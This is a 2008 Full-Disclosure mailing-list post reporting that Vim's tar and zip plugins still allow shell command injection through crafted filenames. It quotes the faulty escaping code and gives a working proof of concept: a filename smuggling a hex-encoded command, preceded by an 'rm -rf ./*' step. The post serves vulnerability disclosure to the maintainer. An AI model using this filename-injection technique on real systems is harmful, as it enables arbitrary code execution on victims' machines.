On Sat, Jun 14, 2008 at 2:09 PM, Bram Moolenaar <Bram_at_moolenaar.net> wrote:
>
> Jan Minar wrote:
>
>> 1. Summary
>>
>> Product : Vim -- Vi IMproved
>> Version : Tested with 7.1.314 and 6.4
>> Impact : Arbitrary code execution
>> Wherefrom: Local and remote
>> Original : http://www.rdancer.org/vulnerablevim.html
>>
>> Improper quoting in some parts of Vim written in the Vim Script can lead to
>> arbitrary code execution upon opening a crafted file.
> Note that version 7.1.314, as reported in the Summary, does not have
> most of the reported problems. The problems in the plugins have also
> been fixed, this requires updating the runtime files. Information about
> that can be found at http://www.vim.org/runtime.php
I do apologize: as written in the advisory, the version I worked with
was 7.1.298. 7.1.314 was only partly vulnerable. FWIW, I have
updated the advisory at http://www.rdancer.orgvulnerablevim.html .
Thanks to Bram for all the good work.
7.2a.10 with updated runtime is still vulnerable to the zipplugin
attack, and an updated tarplugin attack:
-------------------------------------------
-------- Test results below ---------------
-------------------------------------------
filetype.vim
strong : EXPLOIT FAILED
weak : EXPLOIT FAILED
tarplugin : EXPLOIT FAILED
tarplugin.updated: VULNERABLE
zipplugin : VULNERABLE
xpm.vim
xpm : EXPLOIT FAILED
xpm2 : EXPLOIT FAILED
remote : EXPLOIT FAILED
gzip_vim : EXPLOIT FAILED
netrw : EXPLOIT FAILED
The original tarplugin exploit now produces a string of telling error messages:
/bin/bash: so%: command not found
tar: /home/rdancer/vuln/vim/tarplugin/sploit/foo'|sosploit/foo:
Cannot open: No such file or directory
tar: Error is not recoverable: exiting now
/bin/bash: retu: command not found
/bin/bash: bar.tar|retu|'bar.tar: command not found
It's easy to see that it is still possible to execute arbitrary shell commands.
$VIMRUNTIME/autoload/tar.vim of Vim 7.2a.10:
136 if tarfile =~# '\.\(gz\|tgz\)$'
137 " call Decho("1: exe silent r! gzip -d -c
".s:Escape(tarfile)." | ".g:tar_cmd." -".g:tar_browseoptions." - ")
*138 exe "silent r! gzip -d -c -- ".s:Escape(tarfile)." |
".g:tar_cmd." -".g:tar_browseoptions." - "
139 elseif tarfile =~# '\.lrp'
140 " call Decho("2: exe silent r! cat --
".s:Escape(tarfile)."|gzip -d -c -|".g:tar_cmd."
-".g:tar_browseoptions." - ")
*141 exe "silent r! cat -- ".s:Escape(tarfile)."|gzip -d -c
-|".g:tar_cmd." -".g:tar_browseoptions." - "
142 elseif tarfile =~# '\.bz2$'
143 " call Decho("3: exe silent r! bzip2 -d -c
".s:Escape(tarfile)." | ".g:tar_cmd." -".g:tar_browseoptions." - ")
*144 exe "silent r! bzip2 -d -c -- ".s:Escape(tarfile)." |
".g:tar_cmd." -".g:tar_browseoptions." - "
145 else
146 " call Decho("4: exe silent r! ".g:tar_cmd."
-".g:tar_browseoptions." ".s:Escape(tarfile))
**147 exe "silent r! ".g:tar_cmd." -".g:tar_browseoptions."
".s:Escape(tarfile)
[...]
444 fun s:Escape(name)
445 " shellescape() was added by patch 7.0.111
446 if exists("*shellescape")
447 let qnameq= shellescape(a:name)
448 else
449 let qnameq= g:tar_shq . a:name . g:tar_shq
450 endif
451 return qnameq
452 endfun
(*) s:Escape() does not suffice, as it fails to escape ``%'' and friends.
(**) tar(1) allows arbitrary command execution via options ``--to-command'',
and ``--use-compress-program''.
The updated tarplugin attack is rather simple:
$ rm -rf ./*
$ touch "foo%;eval eval \`echo 0:64617465203e2070776e6564 |
xxd -r\`;'bar.tar"
$ vim +:q ./foo*
$ ls -l pwned
-rw-r--r-- 1 rdancer users 29 2008-07-01 20:18 pwned
Cheers,
Jan Minar.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Received on Jul 01 2008
Intro
